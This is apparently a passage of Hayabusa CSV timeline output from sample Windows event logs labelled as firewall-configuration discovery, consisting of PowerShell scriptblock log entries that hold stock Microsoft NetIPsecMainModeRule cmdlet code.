[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 